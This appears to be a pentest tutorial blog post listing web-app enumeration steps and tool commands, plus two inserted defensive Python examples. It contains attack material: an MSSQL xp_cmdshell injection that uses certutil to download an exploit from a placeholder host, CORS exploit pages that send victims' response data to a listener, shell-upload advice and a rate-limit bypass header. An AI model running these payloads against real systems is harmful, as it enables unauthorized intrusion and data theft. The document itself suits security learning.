Hello Minna-san, this post covers some basic checks to be carried out while penetration testing a web application; it doesn't cover the exploitation part yet.
Simple Web Page Enum Checklist
- Scan All the Ports via Nmap
- Web Servers can be Found on any port
- nmap -Pn -p- 10.10.10.10
- Check robots.txt
- Run nikto, dirb, dirsearch.py --> check large dictionaries
- nikto -h 10.10.10.10
- dirb http://10.10.10.10
- dirsearch.py -u http://10.10.10.10 -e '*'
- CUPP -i
- Try all kinds of HTTP methods - GET, POST, PUT
- Try with curl -X PUT --upload-file <filename> <web server address>
- Check for login pages; if you find any, try to log in with default creds, then send the request to Burp Intruder/Turbo Intruder and brute-force it
- Check the CMS of the Application
- If it's WordPress/Drupal/Joomla, run their specific scanners - wpscan, drupscan
- Try to log in with default credentials - use Intruder / wpscan
- search for vulnerable plugins
- Use CeWL to generate a list of passwords/usernames and emails
- Check whether the CMS version has any known vulnerabilities
- Intercept the request and see what's going on in the backend
- If you are able to log in but do not have write access to any page, upload a vulnerable plugin and exploit it
- After authentication: if the OS is unknown, go to "Template Editor" --> try uploading different kinds of shells --> php, php4, php5, php.png
- Run sqlmap, w3af or any automated scanning on the application
- Check the webserver information using whatweb
- whatweb 10.10.10.10
- whatweb 10.10.10.0/16 --no-errors | grep -v Unassigned
- Check the HTTP response headers; you might see the application server or proxy information
- Authenticated: Check for file uploads or any input fields
Finding Vulnerabilities using Tools
Sn1per
```bash
Sn1per -t 10.10.10.10 -m vulnscan
Sn1per -t 10.10.10.10 -m webscan
```
Nuclei template categories: cves, vulnerabilities, exposed-panels, takeovers, exposures, technologies, misconfiguration, workflows, miscellaneous, default-logins, file, dns, fuzzing, helpers, iot
```bash
# Update the templates
nuclei -update-templates
# Scan the target using the given templates
nuclei -t cves 10.10.10.10
# Scan CVE templates filtered by severity
nuclei -t cves/ -severity critical -l <target-list>
# Scan all templates except a few
nuclei -l <target-list> -t nuclei-templates/ -exclude iot/ -exclude technologies
# Run an automated authenticated scan with a given list of templates
nuclei -u https://domain/ -as -t cves,vulnerabilities,exposed-panels,takeovers,exposures,technologies,misconfiguration,workflows,miscellaneous,default-logins,file,dns,fuzzing,iot -H "Authorization: Bearer sdasdsada"
```
Nikto
```bash
nikto -h 10.10.10.10
nikto -h 10.10.10.10 -ssl
```
Joomla CMS
```bash
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl -u www.example.com --ec
```
If it's a Windows operating system and you think there might be an SQL injection, the database is likely MSSQL; you can try this.
```sql
';EXEC xp_cmdshell 'any windows command'
';EXEC xp_cmdshell 'certutil -urlcache -f http://IP_address/exploit.aspx';--
-- In case you don't have enough privileges, try the commands below
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
```
Validating Webpages from Multiple IPs
```bash
nmap -Pn -p443 10.10.103.0/24 --open -oG https
grep ' 443/open/' https | cut -d' ' -f 2 | sort -uV > 443.txt
for i in $(cat 443.txt); do (wget "https://$i" --no-check-certificate --tries=1 -O "$i") & done
for i in $(seq 1 255); do (curl -s -I -vv "https://10.10.10.$i" --connect-timeout 2) 2>&1; done | tee 443
for i in $(seq 1 255); do (wget "https://10.10.10.$i" -t 1 --connect-timeout=5); done | tee wget-443
```
Find URL Shortnames
```bash
git clone https://github.com/bitquark/shortscan
shortscan https://domain.com/
shortscan https://domain.com/admin/
shortscan https://domain.com/test/
```
Check for AEM Vulns
```bash
git clone https://github.com/0ang3el/aem-hacker.git
# Scan an AEM web app for vulnerabilities
python3 aem_hacker.py -u https://aem.webapp --host SSRF_TestServer_IP
# Scan a list of URLs and find AEM web apps among them
python3 aem_discoverer.py --file urls.txt --workers 150
```
More tools are available on GitHub.
HTTP Verb Tampering
```bash
#!/bin/bash
# Usage: ./verbs.sh <host>  - prints the status line the server returns for each method
for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND; do
    printf "%s " "$webservmethod"
    printf "%s / HTTP/1.1\r\nHost: %s\r\n\r\n" "$webservmethod" "$1" | nc -q 1 "$1" 80 | grep "HTTP/1.1"
done
```
Nikto against a list of IPs
```bash
for i in $(cat ips.txt); do (nikto -h "$i" -o "$i" -Format txt) & done
```
SSLScan
Burp Suite Tips
- Look for parameters (sitemap --> filter by parameter)
- Look for hidden fields (proxy --> options --> Response modification --> "unhide hidden form fields")
- Check Host Header injection
- Check for CORS
Session handling with anti-CSRF token:
Capture the request -->
Project options --> Sessions --> Macros --> Add --> select the URL from HTTP history --> hit "Configure this item" --> under "Custom parameter locations in response" click "Add" --> find the anti-CSRF token in the page response under the dialogue box and select it; it should automatically update the expression --> name the parameter (exactly the same as the anti-CSRF parameter) and click "OK" --> "Test macro" --> the macro is now saved
Session handling rules --> "Add" a new rule --> "name" the rule --> under Rule Actions click "Add" --> select "Run a macro" --> select the macro created earlier --> select "Update only the following parameters" and type the anti-CSRF parameter name that you want updated every time; click edit; enter the param name --> add --> close --> OK --> OK; you should see the new rule under session handling rules
*Now whenever you run the URL in Repeater, the anti-CSRF token will update automatically*
Check for CORS
Burp --> proxy --> options --> match & replace --> Add -->
Type: Request header
Match: Origin: https://domain.com
Replace: Origin: https://untrusted.domain.com
--> OK
Check the response for 'Access-Control-Allow-Origin'; if you find untrusted.domain.com in the response --> it's vulnerable to CORS misconfiguration
204 No Content status code --> not vulnerable
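The same decision the manual Burp check above makes by eye, as an added example that is not part of the original post: parse a raw response to the spoofed-Origin probe and classify its CORS headers (reflected origin, wildcard, null, allow-list, or the 204 case). The responses are constructed here; `untrusted.domain.com` is the probe origin from the steps above.

```python
"""Classify CORS headers returned for a probe request carrying a spoofed Origin.
Added example; sample responses below are constructed, not captured."""
from typing import Dict, Tuple

PROBE_ORIGIN = "https://untrusted.domain.com"   # the Origin value Burp substituted


def parse_response(raw: str) -> Tuple[int, Dict[str, str]]:
    """Split a raw HTTP response into (status code, lower-cased header map)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def assess_cors(raw_response: str, probe_origin: str = PROBE_ORIGIN) -> str:
    """Return a verdict string for the CORS grant seen in the probe response."""
    status, h = parse_response(raw_response)
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if status == 204 or acao is None:
        return "not vulnerable"            # no grant at all / 204 rule from the checklist
    if acao == probe_origin:               # server echoed the attacker-chosen origin
        return "vulnerable: origin reflected" + (" with credentials" if creds else "")
    if acao == "*":                        # browsers refuse '*' together with credentials
        return "wildcard origin" + (" with credentials (browser rejects)" if creds else ", public data only")
    if acao == "null":
        return "vulnerable: null origin allowed"
    return "allow-list: " + acao           # fixed origin, not under probe control


# Constructed sample responses
REFLECTED = ("HTTP/1.1 200 OK\r\n"
             "Access-Control-Allow-Origin: https://untrusted.domain.com\r\n"
             "Access-Control-Allow-Credentials: true\r\n"
             "Content-Type: application/json\r\n\r\n"
             '{"user": "alice"}')
STRICT = "HTTP/1.1 200 OK\r\nAccess-Control-Allow-Origin: https://domain.com\r\n\r\n{}"
NO_CONTENT = "HTTP/1.1 204 No Content\r\nAccess-Control-Allow-Origin: https://untrusted.domain.com\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("reflected", REFLECTED), ("strict", STRICT), ("204", NO_CONTENT)):
        print(f"{name:10} -> {assess_cors(raw)}")
```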
Exploiting CORS
Host the following page on an HTTPS server:
```html
<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://domain.com/CORS/issue', true);
req.withCredentials = true;
// Note: browsers ignore setRequestHeader for forbidden headers such as Origin and Cookie
// and set them themselves; the calls are kept as in the original script.
req.setRequestHeader('Origin', 'https://localhost');
req.setRequestHeader('Cookie', 'user-token=COOKIE_VALUE');
req.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with');
req.send();

function reqListener() {
  location = 'https://localhost/log?key=' + this.responseText;
}
</script>
</body>
</html>
```
```html
<html>
<head></head>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
  if (this.readyState == 4 && this.status == 200) {
    var xhr2 = new XMLHttpRequest();
    // attacker.server: attacker listener to steal response
    xhr2.open("POST", "https://localhost", true);
    xhr2.send(xhr.responseText);
  }
};
// victim.site: vulnerable server with `Access-Control-Allow-Origin: *` header
xhr.open("GET", "https://domain.com/asdsa", false);
xhr.withCredentials = true;
xhr.setRequestHeader('Origin', 'https://localhost');
xhr.setRequestHeader('Cookie', 'user-token=');
xhr.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with');
xhr.send();
</script>
</body>
</html>
```
Tips:
- Check for CORS origin (create a spoofed Origin using proxy --> options --> match & replace --> add 'Origin: test.pentest.com')
- Try injection on all headers
- Send anti-CSRF tokens to Sequencer
- Compare site maps for ACLs (using the Compare Site Maps feature)
- Set Burp as the outgoing proxy in ZAP to view the OWASP ZAP traffic in Burp
Techniques:
Bypass rate limit: add an "X-Forwarded-For: 127.0.0.1" header to the request
You can also refer to this page, which covers most of the web attacks: Newbie pentest
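The defender's side of the X-Forwarded-For trick above, as an added example that is not from the original post: a rate limiter must key on an address derived only from trusted proxy hops, so a spoofed "X-Forwarded-For: 127.0.0.1" from an untrusted peer is ignored. The trusted proxy range 10.0.0.0/24 and the request samples are assumed values.

```python
"""Resolve the client IP for rate limiting without trusting attacker-supplied
X-Forwarded-For values. Added example; proxy range and requests are constructed."""
import ipaddress
from collections import Counter
from typing import List, Optional, Tuple

# Assumed: addresses of our own reverse proxies; only these may append XFF hops
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/24")]


def _parse_ip(text: str):
    """Return an ip_address object or None if the text is not a valid address."""
    try:
        return ipaddress.ip_address(text.strip())
    except ValueError:
        return None


def _is_trusted(ip) -> bool:
    return ip is not None and any(ip in net for net in TRUSTED_PROXIES)


def client_ip(peer_addr: str, xff: Optional[str]) -> str:
    """Walk X-Forwarded-For right to left, skipping hops we trust; the first
    untrusted hop is the real client. If the TCP peer itself is not a trusted
    proxy, the header is attacker-controlled and is ignored entirely."""
    if not _is_trusted(_parse_ip(peer_addr)) or not xff:
        return peer_addr
    for hop in reversed(xff.split(",")):
        ip = _parse_ip(hop)
        if ip is None:
            return peer_addr            # malformed header: refuse to key on garbage
        if not _is_trusted(ip):
            return str(ip)
    return peer_addr                    # every hop was one of our proxies


def rate_limit(requests: List[Tuple[str, Optional[str]]], limit: int) -> List[bool]:
    """Return, per request, whether it exceeds `limit` requests from its resolved client."""
    seen: Counter = Counter()
    verdicts = []
    for peer, xff in requests:
        key = client_ip(peer, xff)
        seen[key] += 1
        verdicts.append(seen[key] > limit)
    return verdicts


# Constructed: one direct client rotating spoofed XFF values on every request
SPOOFED = [("203.0.113.9", f"127.0.0.{i}") for i in range(1, 6)]
```

Because the direct peer is not a trusted proxy, every spoofed value is dropped and the fourth and fifth requests are blocked at limit 3.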